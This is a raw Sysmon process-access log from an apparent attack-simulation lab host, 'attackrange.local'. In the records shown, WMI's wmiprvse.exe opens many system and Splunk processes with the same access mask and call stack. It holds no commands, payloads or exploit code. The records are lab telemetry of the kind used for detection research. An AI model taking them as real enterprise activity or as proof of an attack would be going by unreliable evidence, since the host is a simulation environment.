15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024708Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024707Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024706Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024705Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024704Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024703Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024702Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024701Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024700Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024699Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024698Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024697Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024696Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024695Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024694Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024693Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024692Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024691Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024690Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024689Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 